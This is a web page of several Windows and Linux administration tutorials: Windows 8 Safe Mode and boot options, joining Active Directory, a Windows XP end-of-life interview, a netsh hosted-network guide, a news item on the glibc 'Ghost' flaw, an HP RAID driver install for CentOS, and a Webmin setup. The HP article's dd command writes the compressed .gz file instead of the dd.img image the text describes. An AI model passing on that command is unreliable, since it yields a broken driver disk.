Again, Windows will acknowledge - The operation completed successfully. The changes will take place on the next reboot and the F8 key will no longer boot Windows into Safe Mode.

This article explained how to successfully start Windows 8 and Windows 8.1 in Safe Mode. We also saw how to enable the F8 Safe Mode fuction which is disabled by default.

Visit our Windows 8/8.1 section to read more hot topics on the Windows 8 operating system.

 

  • Hits: 54307

How to Enable & Use Windows 8 Startup Settings Boot Menu (Workstations, Tablet & Touch Devices)

The Windows 8 Start Settings Boot Menu allows users to change the way Windows 8 starts up. This provides users with the ability to enable Safe Mode with or without Command Prompt, Enable Boot Logging, Enable Debugging and much more. Access to the Setup Settings Boot Menu is provided through the Advanced Startup Options Menu as described in detail below. Alternatively users can use the following command in the Run prompt to restart and boot directly into the Advanced Startup Options Menu:

shutdown /r /o /t 0

While not enabled by default, users can use the F8 key to enter Safe Mode when booting into the operating system, just as all previous Windows versions. To learn more on this, read our How to Start Windows 8 and 8.1 in Safe Mode – Enabling F8 Safe Mode article.

Enabling the Windows 8 Startup Settings Boot Menu via GUI

Start with the Windows 8 Start screen. Type the world advanced directly, which will bring up the items you can search. You may also slide in from the right edge, tap/click on the Search Icon and type advanced into the resulting dialog box. Within the Search items listed, tap/click on Settings:

windows8-startup-settings-boot-menu-1Figure 1. Search Settings

 Windows will now show you the Advanced Startup Options within a dialog box as shown below:

windows8-startup-settings-boot-menu-2Figure 2. Advanced Settings Search Result

 Tapping or clicking within the dialog box will take you to the PC Settings screen. Tap/click on the General Button and scroll down the menu on the right hand side until you come to Advanced Startup. Directly underneath is the Restart Now button:

windows8-startup-settings-boot-menu-3Figure 3. PC Settings

 Tapping/clicking on the Restart Now button will let Windows offer its Options screen:

windows8-startup-settings-boot-menu-4Figure 4. Choose Options

 On the Options screen, tap/click on the Troubleshoot button to bring up the Troubleshoot menu:

windows8-startup-settings-boot-menu-5Figure 5. Troubleshoot Menu

 From here tap/click on the Advanced Options button to get to the Advanced Options menu:

windows8-startup-settings-boot-menu-6Figure 6. Advanced Options Menu

From the Advanced Options Menu, tap/click on the Startup Settings button. This brings you to the Startup Settings screen showing the various startup settings of Windows 8 that you will be able to change when you Restart. To move ahead, tap/click on the Restart button on the lower right corner of the screen:

windows8-startup-settings-boot-menu-7Figure 7. Startup Settings Screen

 Windows 8 will now reboot, taking you directly into the Startup Settings Boot Menu. Your mouse pointer will not work here and you must type the number key (or the function key) corresponding to your selection. If you wish to see more options, you can do so by pressing the F10 key:

windows8-startup-settings-boot-menu-8Figure 8. Startup Settings Boot Menu

To return without making any changes, hit the Enter key on your keyboard; you will need to login once again.

The menu options presented are analysed in detail below.

Windows 8 Startup Settings Boot Menu

The Windows 8 Startup Settings Boot Menu lists all the options from which you can select one to alter the way Windows will boot up next. You must be careful here, as there is no way you can go back on your selection and Windows will directly proceed to boot with the selected option. Each option results in a different functionality, as discussed below:

  • Enable Debugging – Useful only if you have a kernel debugger connected to your computer and you want it to control system execution. This option is usually used by advanced Windows users.
  • Enable boot logging – Useful if you want to know what is happening during boot time. This option forces Windows to create a log file at the following path C:\Winodws\Ntbtlog.txt, where you will find detailed information about the boot process. For example, if there is a problem with the starting of a specific driver, you will find the relevant information in the log file. Used normally by intermittent to advanced users.
  • Enable low-resolution video – Useful if you are facing trouble with your video graphics card and you are unable to see Windows properly. This option will let Windows start up in a low-resolution mode, from where you can specify the proper video resolution that Windows can use.
  • Enable Safe Mode – Useful if you want Windows to bypass the normal video card driver and use the generic VGA.sys driver instead. With this option, Windows will start up in a bare-bones mode and will load only programs as are barely necessary for it to work. Network support is disabled in this mode, so do not expect to connect to the Internet or local network.
  • Enable Safe Mode with Networking – This mode offers similar abilities as the previous Enable Safe Mode (Option 4) and provides additional network support, allowing connectivity to the local network or Internet.
  • Enable Safe Mode with Command Prompt – Useful when you want Windows online but with only a command prompt to type in commands, rather than the usual Windows GUI desktop. In this mode, Windows will only load the bare necessary programs to allow it to run. In place of the normal video card driver, Windows will operate the VGA.sys driver. However, do not confuse this mode with the Windows 8 Recovery Environment Command Prompt, where Windows operates offline.
  • Disable driver signature enforcement – Useful for loading unsigned drivers requiring kernel privileges. Typically, Windows does not allow drivers requiring kernel privileges to load unless it can verify the digital signature of the company that developed the driver. This option must be used very carefully, as you are setting aside the security reasons that normally would prevent malware drivers from sneaking in into your computer.
  • Disable early launch anti-malware protection – Useful to prevent driver conflicts that are preventing Windows from starting. A new feature in Windows 8 allows a certified anti-virus to load its drivers before Windows can load any other third-party driver. Therefore, the anti-virus software is available to scan all drivers before they are loaded. If the anti-virus program detects any malware, it blocks that driver. Since this is a great security feature, disable it only when necessary and apply extreme caution.
  • Disable automatic restart after failure – Useful when you want to see the crash information because Windows restarts too quickly after a crash making it impossible to read the information. Usually, after a crash, Windows displays an error message before automatically rebooting. You may not be able to read the information displayed if Windows reboots very quickly. This option prevents Windows from rebooting after a crash, allowing you to read the error message and take appropriate action.
  • Launch Recovery Environment – Useful for accessing recovery and diagnostic tools. This option is available when you press F10 in the Startup Settings Boot Menu. These options are available under Advanced Options Menu - see Figure 6.

This article covered how enable and use the Startup Settings Boot Menu in Windows 8 and also explained in great detail the Windows 8 Startup Settings Boot Menu. Readers interested in learning how to enable F8 Safe Mode functionality can read the article by clicking here.

  • Hits: 41237

How to Join a Windows 8, 8.1 Client to Windows Domain - Active Directory

In this article, we will show how to add a Windows 8 or Windows 8.1 client to a Windows Domain / Active Directory. The article can be considered an extention to our Windows 2012 Server article covering Active Directory & Domain Controller installation.

Our client workstation, FW-CL1, needs to join the Firewall.local domainFW-CL1 is already installed with Windows 8.1 operating system and configured with an IP address 192.168.1.10 and a DNS server set to 192.168.1.1, which is the domain controller. It is important that any workstation needing to join a Domain, has its DNS server configured with the Domain Controller's IP address to ensure proper DNS resolution of the Domain:

windows-8-join-active-directory-1Figure 1. FW-CL1 IPconfig

Now, to add the workstation to the domain, open the System Properties of FW-CL1 by right-clicking in the This PC icon and selecting properties:

windows-8-join-active-directory-2Figure 2. System Settings

Next, click Advanced system settings option in the upper left corner. The System Properties dialog box will open. Select the Computer Name tab and then click on the Change… button to add this computer to the domain.

windows-8-join-active-directory-3Figure 3. System Properties

In the next window, select the Domain: option under the Member of section and type the company's domain name. In our lab, the domain name is set to firewall.local. When done, click on the OK button.

windows-8-join-active-directory-4Figure 4. Adding PC to Domain

The next step involves entering the details of a domain account that has permission to join the domain. This security measure ensures no one can easily join the domain without the necessary authority. Enter the domain credentials and click OK:

windows-8-join-active-directory-5Figure 5. Enter Domain Credentials

If the correct credentials were inserted, the PC becomes a member of the domain. A little welcome message will be displayed. Click OK and Restart the PC to complete the joining process:

windows-8-join-active-directory-6Figure 6. Member of Domain

The detailed operations that occur during a domain join can be found in the %systemroot%\debug\NETSETUP.LOG file.

At a higher level, when you join a computer in Active Directory, a Computer Account is created in the Active Directory database and is used to authenticate the computer to the domain controller every time it boots up.

 This completes our discussion on how to join a Windows 8 & Windows 8.1 Client to Windows Domain - Active Directory.

  • Hits: 83231

Microsoft Windows XP - End of Life / End of Support

A Q&A with Cristian Florian, Product Manager For GFI LanGuard On Security Implications & Planning Ahead

windows-xp-eosWith Windows XP End of Life & End of Support just around the corner (8th of April 2014), companies around the globe are trying to understand what the implications will be for their business continuity and daily operations, while IT Managers and Administrators (not all) are preparing to deal with the impact on users, applications and systems.

At the same time, Microsoft is actively encouraging businesses to migrate to their latest desktop operating system, Windows 8.

 

One could say it’s a strategy game well played on Microsoft’s behalf, bound to produce millions of dollars in revenue, but where does this leave companies who are requested to make the hard choice and migrate their users to newer operating systems?

Do companies really need to rush and upgrade to Windows 7 or 8/8.1 before the deadline? Or do we need to simply step back for a moment and take things slowly in order to avoid mistakes that could cost our companies thousands or millions of dollars?

 Parallel to the above thoughts, you might find yourself asking if software companies will continue deliver support and security patches for their products; a question that might be of greater significance for many companies.

To help provide some clear answers to the above, but also understand how companies are truly dealing with the Windows XP End of Life, Firewall.cx approached GFI’s LanGuard product manager, Cristian Florian, to ask some very interesting questions that will help us uncover what exactly is happening in the background… We are certain readers will find this interview extremely interesting and revealing….

Interview Questions

Hello Cristian and thank you for accepting Firewall.cx’s invitation to help demystify the implications of Windows XP End of Life and its true impact to companies around the globe.

Response:

Thank you. Windows XP’s End of Life is a huge event and could have a significant security impact this year. So it will be important for companies to know what the risks are and how to mitigate them.

 

Question 1
Is Microsoft the only company dropping support for Windows XP? Taking in consideration Windows XP still holds over 29% of the global market share for desktop operating systems (Source Wikipedia https://en.wikipedia.org/wiki/Usage_share_of_operating_systems Feb. 2014), how are software companies likely to respond? Are they likely to follow Microsoft’s tactic?
 
Response:
A good number of companies have committed to support Windows XP beyond Microsoft’s End of Life date, but eventually they will have to drop support too. Although still high, the market share for Windows XP is showing a constant decline and once the deadline is reached, it will not take long before companies realize that it is no longer viable to dedicate resources to support and retain compatibility with Windows XP.

Google said that Chrome support for Windows XP will continue until April 2015. Adobe, however, will release the last version of Adobe Reader and Acrobat that still supports Windows XP in May 2014.

Microsoft will continue to provide antimalware definition updates for Windows XP until July 2015, and all major antivirus vendors will continue to support Windows XP for a period of time. Some of them have stated that they will support it until 2017 or 2018. Antivirus support is important for XP but one note of caution is that antivirus alone does not offer full protection for an operating system. So while supporting Windows XP is commendable, vendors need to be careful that they do not offer a false sense of security that could backfire on them and hurt their reputation.

 

Question 2
GFI is a leader in Network Security Software, automating patching and vulnerability assessments for desktop & server operating systems. We would like to know how GFI will respond to Windows XP End of Life.
 
Response:
We are telling our customers and prospects that Windows XP will not be a safe operating system after April 8. As of this year, Windows XP systems now show up in GFI LanGuard’s dashboard as high security vulnerabilities for the network during vulnerability assessments.

We will continue to provide patch management support for Windows XP. For as long as customers use XP and vendors release updates compatible with the OS, we will do what we can to keep those systems updated and as secure as possible. What is important to note is that this is simply not enough. The necessary security updates for the operating system will no longer be available and these are crucial for the overall security of the system and the network.

A GFI LanGuard trial offers unlimited network discovery and it can be used to track free of charge all Windows XP systems on the network. IT admins can use these reports to create a migration plan to a different operating system.

 

Question 3
Do IT Managers and Administrators really need to worry about security updates for their Windows XP operating system? Is there any alternative way to effectively protect their Windows XP operating systems?
 
Response:
If they have Windows XP systems, they should definitely be concerned.

In 2013 and the first quarter of 2014, Microsoft released 59 security bulletins for Windows XP; 31 of which are rated as critical. The National Vulnerability Database had reported 88 vulnerabilities for Windows XP in 2013, 47 of them, critical. A similar number of vulnerabilities is expected to be identified after April 8, but this time round, no patches will be available.

Part of the problem is due to the popularity of Windows XP. Because it is used so widely, it is a viable target for malware producers. It is highly probable that a number of exploits and known vulnerabilities have not been disclosed and will only be used after April 8 – when they know there won’t be any patch coming out of Microsoft.

There are only two options: either upgrade or retire the systems altogether. If they cannot be retired, they should be kept offline.

 
Question 4
What do you believe will be the biggest problem for those who choose to stay with Windows XP?
 
Response:
There are three problems that arise if these systems are still connected to the Internet. First, each system on its own will be a target and prone to attack quite easily. Second, and this is of greater concern, is that machines running XP will be used as gateways into the entire network. They are the weakest link now in the chain and can also be hijacked to spread spam and malware and a conduit for DDoS attacks.

Third, compliance. Companies that are using operating systems not supported by the manufacturer are no longer compliant with security regulations such as PCI DSS, HIPAA, PSN CoCo and others. They can face legal action and worse if the network is breached.

 

Question 5
GFI is well known in the IT Market for its security products and solutions. Your products are installed and trusted by hundreds and thousands of companies. Can you share with us what percentage of your customer database still runs the Windows XP operating system, even though we’ve got less than a month before its End of Life?
 
Response:
We have seen a marked decline in the number of XP users among our customers. A year ago, we were seeing up to 51% of machines using XP, with 41% having at least one XP system. Looking at the data this year, 17% are still using XP, with 36% having at least one Window XP system.

 

  • Hits: 19857

Configuring Windows 7 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows into an Access Point

windows7-access-point-1-preNot many people are aware that Windows 7 has built-in capabilities that allow it to be transformed into a perfectly working access point so that wireless clients such as laptops, smartphones and others can connect to the local network or obtain Internet access. Turning a Windows 7 system into an access point is an extremely useful feature, especially when there is the need to connect other wireless devices to the Internet with no access point available.

When Windows 7 is configured to provide access point services, the operating system is fully functional and all system resources continue to be available to the user working on the system. In addition, the wireless network is encrypted using the WPA2 encryption algorithm.

Even though there are 3rd-party applications that will provide similar functionality, we believe this built-in feature is easy to configure and works well enough to make users think twice before purchasing such applications.

Windows 8 & 8.1 users can visit our article Configuring Windows 8 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows 8 into an Access Point 

Creating Your Windows 7 Access Point

While there is no graphical interface that will allow you magically to turn Windows 7 into an access point, the configuration is performed via CLI using one single command. We should note that when turning a Windows 7 station into a Wi-Fi access point, it is necessary to ensure the station’s wired network card (RJ45) is connected to the local network (LAN) and has Internet access. Wireless clients that connect to the Windows 7 AP will obtain Internet access via the workstation’s wired LAN connection and will be located on a different subnet network.

To begin, click on the Start button and enter cmd.exe in the Search Programs and Files area as shown below:

windows7-access-point-1

Next, right click on cmd.exe and select Run as administrator from the menu. This will open a DOS prompt with administrator privileges, necessary to execute the CLI command.

As mentioned earlier, a single command is required to create the Windows 7 access point and here it is:

netsh wlan set hostednetwork mode=allow "ssid=myssid"  "key=mykey” keyUsage=persistent

The only parameters that will need to change from the above command are the ssid and key parameters. All the rest can be left as is. The ssid parameter configures the ssid that will be broadcast by the Windows 7 operating system, while the key parameter defines the WPA2-Personal key (password) that the clients need to enter in order to connect to the Wi-Fi network.

Following is an example that creates a wireless network named Firewall.cx with a WPA2 password of $connect$here :

C:\Windows\system32> netsh wlan set hostednetwork mode=allow "ssid=Firewall.cx" "key=$connect$here" keyUsage=persistent

The hosted network mode has been set to allow.

The SSID of the hosted network has been successfully changed.

The user key passphrase of the hosted network has been successfully changed.

C:\Windows\system32>

When executed, the above command creates the required Microsoft Virtual WiFi Miniport adapter and will setup the hostednetwork. The new Microsoft Virtual WiFi Miniport adapter will be visible in the Network Connections panel as shown below. In our example the adaptor is named Wireless Network Connection 2. Note that this is a one-time process and users will not need to create the adaptor again:

windows7-access-point-2

Next step is to start the hosted wireless network. The command to start/stop the hostednetwork is netsh wlan start|stop hostednetwork and needs to be run as administrator. Simply run the command in the same DOS prompt previously used:

C:\Windows\system32>netsh wlan start hostednetwork

The hosted network started.

C:\Windows\system32>

Notice how our Wireless Network Connection 2 has changed status and is now showing our configured SSID Firewall.cx:

windows7-access-point-3

To stop the hosted network, repeat the above command with the stop parameter:

C:\Windows\system32>netsh wlan stop hostednetwork
The hosted network stopped.

Starting The WLAN via Shortcuts – Making Life Easy

Users who frequently use the above commands can quickly create two shortcuts to start/stop the hosted network. 

To help save time and trouble, we've created the two shortcuts and made them available for download in our Administrator Utilities Download Section.  Simply download them and unzip the shortcuts directly on the desktop:

windows7-access-point-4

Double-clicking on each shortcut will start or stop the hosted network. Users experiencing problems starting or stopping the hosted network can right-click on the shortcuts and select Run as administrator.

 

Enable Internet Connection Sharing  (ICS)

With our hosted network initiated, all that’s required is to enable Internet Connection Sharing on Windows 7. This will force our newly created hosted network (access point) to provide Internet and DHCP services to our wireless clients.

To enable Internet Connection Sharing, go to the Control Panel > Network and Internet > Network and Sharing and select Change Adaptor Settings from the left menu. Right-click on the computer’s LAN network adaptor (usually Local Area Connection) and select properties:

windows7-access-point-5

Next, select the Sharing tab and enable the Internet Connection Sharing option. Under Home networking connection select the newly created wireless network connection, in our example this was Wireless Network Connection 2, and untick Allow other network users to control or disable the shared Internet connection setting as shown below:

windows7-access-point-6

After clicking on OK to accept the changes, we can see that the Local Area Connection icon now has the shared status next to it, indicating this is now a shared connection:

windows7-access-point-7

At this point, our Wndows 7 system has transformed into an access point and is ready to serve wireless clients!

Note: Users with Cisco VPN Client installed will experience problems (Error 442) when trying to connect to VPN networks after enabling ICS. To resolve this issue, simply visit our popular How To Fix Reason 442: Failed to Enable Virtual Adapter article.

Connecting Wireless Clients To Our Wi-Fi Network

Wireless clients can connect to the Windows 7 access point as they would with any normal access point. We connected with success to our Windows 7 access point (SSID: Firewall.cx) without any problem, using a Samsung Galaxy S2 android smartphone:

windows7-access-point-8

After successfully connecting and browsing the Internet from our android smartphone, we wanted to test this setup and see if using a Windows 7 system as an access point had any impact on wireless and Internet browsing performance.

Comparing Real Access Point Performance With A Windows 7 O/S Access Point

To test this out we used a Cisco 1041N access point, which was placed right next to our android smartphone and configured with an SSID of firewall. Both Windows 7 system and Cisco access point were connected to the same LAN network and shared the same Internet connection – a 10,000 Kbps DSL line (~10Mbps).

The screenshot below confirms our android smartphone had exceptional Wi-Fi signal with both access points:

windows7-access-point-9

Keep in mind, the Wi-Fi with SSID firewall belongs to the Cisco 1041N access point, while SSID Firewall.cx belongs to the Windows 7 access point.

We first connected to the Windows 7 access point and ran our tests. Maximum download speed was measured at 6,796Kbps, or around 6,6Mbps:

windows7-access-point-10

Next, we connected to our Cisco 1041N access point and performed the same tests. Maximum download speed was measured at 7,460Kbps, or 7.3Mbps:

windows7-access-point-11

Obviously there was a very small difference in performance, however, this difference is so small that it is hard to notice unless running these kind of tests. In both cases, Internet access was smooth without any interruptions or problems.

Summary

Being able to transform a Windows 7 system into an access point is a handy and much welcomed feature. We’ve used this feature many times in order to overcome limitations where no access point was available and it worked just fine - every time.  Performance seems pretty solid despite the small, unnoticeable degradation in speed, which won’t affect anyone.

While this setup is not designed as an permanent access point solution, it can be used to get you out of difficult situations and can serve a small amount of wireless clients without any problem.

  • Hits: 254034

Critical 15 Year-old Linux Security Hole (Ghost) Revealed

linux-ghost-security-gnu-lib-vulnerability-1Security researchers at qualys.com yesterday released information on a critical 15 year-old Linux security hole which affects millions of Linux systems dated back to the year 2000.  The newly published security hole – code named ‘Ghost’  was revealed yesterday by Qualy’s security group on openwall.com.

The security hole was found in the __nss_hostname_digits_dots() function of the GNU C Library (glibc).

The function is used on almost all networked Linux computers when the computer tries to access another networked computer either by using the /etc/hosts files or, more commonly, by resolving a domain name with Domain Name System (DNS)

As noted by the security team, the bug is reachable both locally and remotely via the gethostbyname*() functions, making it possible remotely exploit it by triggering a buffer overflow by using an invalid hostname argument to an application that performs DNS resolution.

The security hole exists in any Linux system that was built with glibc-2.2 which was released in November 10th, 2000. Qualy mentioned that the bug was patched on May 21st, 2013 in releases glibc-2.17 and glibc-2.18.

Linux systems that are considered vulnerable to the attack include RedHat Enterprise Linux 5, 6 and 7, CentOS 6 and 7Ubuntu 12.04 and Debian 7 (Wheezy).

Debian has is already patching its core systems (https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776391) while Ubuntu has already patched its 12.04 and 10.04 distributions (https://www.ubuntu.com/usn/usn-2485-1/). CentOS patches are also on their way.

  • Hits: 13691

Linux CentOS - Redhat EL Installation on HP Smart Array B110i SATA RAID Controller - HP ML/DL Servers

This article was written thanks to our recent encounter of a HP DL120 G7 rack mount server equipped with a HP Smart Array B110i SATA Raid controller, needed to be installed with the Linux CentOS 6.0 operating system.  The HP Smart Array B110i SATA Raid controller is found on a variety of HP servers, therefore this procedure can be applied to all HP servers equipted with the Smart Array B110i controller.

As with all articles, we have included step-by-step instructions of the HP Smart Array B110i SATA Raid controller drivers, including screenshots (from the server’s monitor), files, drivers and utilities that might be needed.

Provided Download Files:  HP Smart Array B110i Drivers (Redhat 6.0, CentOS 6.0), RawWrite & Win32DiskImager 

The HP SmartArray B110i Story

What was supposed to be pretty straight-forward process, turned out to become a 3 hour troubleshooting session to figure out how to install the necessary Smart Array B110i drivers so that our CentOS 6.0 or Redhat Enterprise Linux 6.0  install process, would recognize our RAID volumes and proceed with the installation of the operating system.

A quick search on Google revealed that we were not alone – hundreds of people seem to have struggled with the same issue long before we did, however we couldn’t locate an answer that provided full instructions on how to deal with the problem, so, we decided to create one that did!

Installation Steps

First step is to enter the server’s BIOS and ensure to Enable SATA RAID Support. This will essentially enable the controller and allow the setup RAID from within the controller. On the HP DL120G7 this option was under the Advanced Options > Embedded SATA Configuration > Enable SATA RAID Support menu:

linux HP b110i installation

Next step is to save and exit the BIOS.  

While the server restarts, when prompted, press F8 to enter the RAID Controller menu and create the necessary RAID and logical volumes. We created two logical drives in a RAID 0 configuration 9.3GB & 1.8TB capacity:

HP b110i logical drive configuration

Next, it was time to prepare the necessary driver disk so that the operating system can ‘see’ the raid controller and drives created. For this process, two things are needed:

  • Correct Disk Driver
  • Create Driver Diskette

Selecting The Correct Disk Driver

HP offers drivers for the B110i controller for a variety of operating systems, including Redhat and SUSE, both for Intel and AMD based CPU systems. The driver diskette image provides the binary driver modules pre-built for Linux, which enables the HP Smart Array B110i SATA RAID Controller. CentOS users can make use of the Redhat drivers without hesitation.

For this article we are providing as a direct download, drivers for RedHat Enterprise Linux & CentOS v6.0 for Intel and AMD 64bit processors (x86-64bit). These files are available at our Linux download section.

 If a diskette driver for earlier or later systems is required, we advise to visit HP’s website and search for the term “Driver Diskette for HP Smart Array B110i” which will produce a good amount of results for all operating systems.

Driver diskette file names have the format “hpahcisr-1.2.6-11.rhel6u0.x86_64.dd.gz” where rhel represents the operating system (RedHat Enterprise Linux), 6u0 stands for update 0 (version 6, update 0 = 6.0) and x86_64 for the system architecture covering x86 platforms (Intel & AMD).

Writing Image To Floppy Disk Or USB Flash

The driver diskette must be uncompressed using a utility such as 7zip (freely available). Uncompressing the file reveals the file dd.img . This is the driver disk image that needs to be written to a floppy disk drive or USB flash.

Linux users can use the following command to create their driver diskette. Keep in mind to substitute /dev/sdb to reflect your usb or floppy drive:

# dd if=hpahcisr-1.2.6-11.rhel6u0.x86_64.dd.gz of=/dev/sdb

Windows users can use RawWrite if they wish to write it to a floppy disk drive or Win32DiskImager to write it to a USB Flash. Both utilities are provided with our disk driver download. Since we had a USB floppy disk drive in hand, we selected RawWrite:

rawwrite usage and screenshot

Loading The Driver Diskette

With the driver diskette ready, it’s time to begin the CentOS installation, by booting from the DVD:

centos 6.0 welcome installation

At the installation menu, hit ESC to receive the boot: prompt. At the prompt, enter the following command: linux dd blacklist=ahci and hit enter to being installation as shown below:

centos 6 initrd.img driver installation

The initial screen of the installation GUI will allow you to load the driver diskette created. At the question, select Yes and hit enter:

linux-b110i-installation-6

Next screen instructs to insert the driver disk into /dev/sda and press OK.  The location /dev/sda refers to our USB Floppy drive, connected to one of our HP server's USB ports during bootup:

linux-b110i-installation-7

The system will present a screen with the message Reading driver disk, indicating the driver is loading and once complete, the message detecting hardware … waiting for hardware to initialize… will appear:

linux-b110i-installation-8

Finally, the installation procedure asks if you wish you load any more driver disks. We answered No and the installation procedure continued as expected. We saw both logical disks and were able to successfully install and use them without any problem:

linux centos logical drive setup

We hope this brief article will help thousands of engineers around the world save a bit of their valuable time!

  • Hits: 98221

Installing & Configuring Linux Webmin - Linux Web-Based Administration

For many engineers and administrators,  maintaining a Linux system can be a daunting task, especially if there’s limited time or experience.  Working in shell mode, editing files, restarting services, performing installations, configuring scheduled jobs (Cron Jobs) and much more, requires time, knowledge and patience.

One of the biggest challenges for people who are new to Linux, is to work with the operating system in an easy and manageable way, without requiring to know all the commands and file paths in order to get the job done.

All this has now changed, and you can now do all the above, plus a lot more, with a few simple clicks through an easy-to-follow web interface.  Sounds too good to be true?  Believe it or not, it is true!  It's time to get introduced to ‘Webmin’.

Webmin is a freeware program that provides web-based interface for system administration and is a system configuration tool for administrators. One of Webmin's strongest points is that it is modular, which means there are hundreds of extra modules/addons that can be installed, to provide the ability to control additional programs or services someone might want to install on their Linux system.

Here are just a few of the features supported by Webmin, out of the box:

  • Setup and administer user accounts
  • Setup and administer groups
  • Setup and configure DNS services
  • Configure file sharing & related services (Samba)
  • Setup your Internet connection (including ADSL router, modem etc)
  • Configure your Apache webserver
  • Configure a FTP Server
  • Setup and configure an email server
  • Configure Cron Jobs
  • Mount, dismount and administer volumes, hdd's and partitions
  • Setup system quotas for your users
  • Built-in file manager
  • Manage an OpenLDAP server
  • Setup and configure VPN clients
  • Setup and configure a DHCP Server
  • Configure a SSH Server
  • Setup and configure a Linux Proxy server (squid) with all supported options
  • Setup and configure a Linux Firewall
  • and much much more!!!

The great part is that webmin is supported on all Linux platforms and is extremely easy to install.  While our example is based on Webmin's installation on a Fedora 16 server using the RPM package, these steps will also work on other versions such as Red Hat, CentOS and other Linux distributions.

Before we dive into Webmin, let's take a quick look at what we've got covered:

  • Webmin Installation
  • Adding Users, Groups and Assigning Privileges
  • Listing and Working with File Systems on the System
  • Creating and Editing Disk Quotas for Unix Users
  • Editing the System Boot up, Adding and Removing Services
  • Managing and Examining System Log Files
  • Setting up and Changing System Timezone and Date
  • Managing DNS Server & Domain
  • Configuring DHCP Server and Options
  • Configuring FTP Server and Users/Groups
  • How to Schedule a Backup
  • Configuring CRON Jobs with Webmin
  • Configuring SSH Server with Webmin
  • Configuring Squid Proxy Server
  • Configuring Apache HTTP Server

Installing Webmin On Linux Fedora / Redhat / CentOS

Download the required RPM file from http://download.webmin.com/download/yum/ using the command (note the root status):

# wget http://download.webmin.com/download/yum/webmin-1.580-1.noarch.rpm

Install the RPM file of Webmin with the following command:

# rpm -Uvh webmin-1.580-1.noarch.rpm

Start Webmin service using the command:

# systemctl start webmin.service

You can now login to https://Fedora-16:10000/ as root with your root password. To ensure you are able to login into your webmin administration interface, simply use the following URL:  https://your-linux-ip:10000 , where "your-linux-ip" is your Linux server's or workstation's IP address.

Running Webmin

Open Firefox or any other browser, and type the URL https://Fedora-16:10000/ :

linux-webmin-1

 

You will be greeted with a welcome screen. Login as root with your root password. Once you are logged in, you should see the system information:

linux-webmin-2

Adding Users, Groups And Assigning Them Privileges

Expand the "System" Tab in the left column index, and select the last entry “Users and Groups”.  You will be shown the list of the "Local Users" on the system:

linux-webmin-3

You can add users or delete them from this window. If you want to change the parameters of any user, you can do so. By clicking on any user, you can see the groups and privileges assigned to them. These can be changed as you like. For example, if you select the user "root", you can see all the details of the user as shown below :

linux-webmin-4

By selecting the adjacent tab in the "Users and Groups" window, you can see the "Local Groups" as well:

linux-webmin-5

Here, you can see the members in each group by selecting that group. You can delete a group or add a new one. You can select who will be the member of the group, and who can be removed from a group. For example, you can see all the members in the group "mem", if you select and open it:

linux-webmin-6

Here, you will be allowed to create a new group or delete selected groups. You can also add users to the groups or delete them as required. If required, you can also change group ID on files and modify a group other modules as well.

Listing And Working With File Systems On The System

By selecting "Disk and Network Filesystems" under the "System" tab on the left index, you can see the different file systems currently mounted.

linux-webmin-7

You can select other type of file system you would like to mount. Select it from the drop down menus as shown:

linux-webmin-8

By selecting a mounted file system, you can edit its details such as whether it should be mounted at boot time, left as mounted or unmount it now, check the file system at boot time. Mount options like read-only, executable, permissions can be set here.

Creating And Editing Disk Quotas For Unix Users

Prior to Linux Installation, a major & key point in Linux Partition is the /home directory.

VHost is widely setup on almost all control panel mechanism on /home location, since Users & Groups, FTP server, User shell, Apache and several other directives are constructed on this /home partition. Therefore, home should be created as a Logical Volume on a Linux native File system (ext3). Here it is assumed there is already a /home partition on the system.

You can set the quotas by selecting “Disk & Network Filesystems” under “System”:

linux-webmin-9

This allows you to create and edit disk quota for the users in your /home partition or directory. Each user is given a certain amount of disk space he can use. Going close to filling up the quota will generally send a warning.

You can also edit other mounts such as the root directory "/" and also set a number of presented mount options:

linux-webmin-10

Editing The System Boot Up, Adding And Removing Services

All Systemd services are neatly listed in the "Bootup and Shutdown" section within "System":

linux-webmin-11

All service related functions such as start, stop, restart, start on boot, disable on boot, start now and on boot, and disable now and on boot are available at the bottom of the screen. This makes system bootup process modification a breeze, even for the less experienced:

linux-webmin-12

 The "Reboot System" and "Shutdown System" function buttons are also located at the bottom, allowing the immediately reboot or shutdown the system.

Managing And Examining System Log Files

Who would have thought managing system log files in Linux would be so easy? Webmin provides a dedicated section allowing the admnistrator to make a number of changes to the preferences of each system's log file. The friendly interface will show you all available system log files and their location.  By clicking on the one of interest, you can see its properties and make the changes you require.

The following screenshot shows the "System Logs" listed in the index under "System" menu option:

linux-webmin-13

All the logs are available for viewing and to editing. The screenshot below shows an example of editing the maillog. Through the interface, you can enable, disable logs and make a number of other changes on the fly:

linux-webmin-14

Another entry under "System" is the important function of "Log File Rotation". This allows you to edit which log file you would like to rotate and how (daily, weekly or monthly). You can define what command will be executed after the log rotation is done. You can also delete the selected log rotations:

linux-webmin-15

Log rotation is very important, especially on a busy system as it will ensure the log files are kept to a reasonable and manageable size.

Setting Up And Changing System Timezone/Date

Webmin also supports setting up system time and date. To do so, you will have to go to "System Time" under "Hardware" in the main menu index.

linux-webmin-16

System time and hardware time can be separately set and saved. These can be made to match if required.

On the next tab you will be able to change the Timezone:

linux-webmin-17

The next tab is the 'Time Server Sync', used for synchronizing to a time-server. This will ensure your system is always in sync with the selected time-server:

linux-webmin-18

Here, you will be able to select a specific timeserver with a hostname or address and set the schedule when the periodic synchronizing will be done.

Managing DNS Server & Domain

DNS Server configuration is possible from the "Hostname and DNS Client", which is located under "Networking Configuration" within "Networking" in the index:

linux-webmin-19

Here you can set the Hostname of the machine, the IP Address of the DNS Servers and their search domains and save them.

Configuring DHCP Server And Options

For configuration of your system's DHCP server, go to “DHCP Server” within “System and Server Status” under “Others”:

linux-webmin-20

All parameters related to DHCP server can be set here:

linux-webmin-21

Configuring FTP Server And Users/Groups

For ProFTPD Server, select “ ProFTPD Server” under “Servers”. You will see the main menu for ProFTPD server:

linux-webmin-22

You can see and edit the Denied FTP Users if you select the "Denied FTP Users":

linux-webmin-23

Configuration file at /etc/proftpd.conf can be directly edited if you select the "Edit Config Files" in the main menu:

linux-webmin-24

How To Schedule A Backup

Whatever the configuration files you would like to backup, schedule and restore, can be done from “Backup Configuration Files” under “Webmin”.

In the “Backup Now” window, you can set the modules, the backup destination, and what you want included in the backup.   The backup can be a local file on the system, a file on an FTP server, or a file on an SSH server. For both the servers, you will have to provide the username and password. Anything else that you would like to include during the backup such as webmin module configuration files, server configuration files, or other listed files can also be mentioned here:

linux-webmin-25

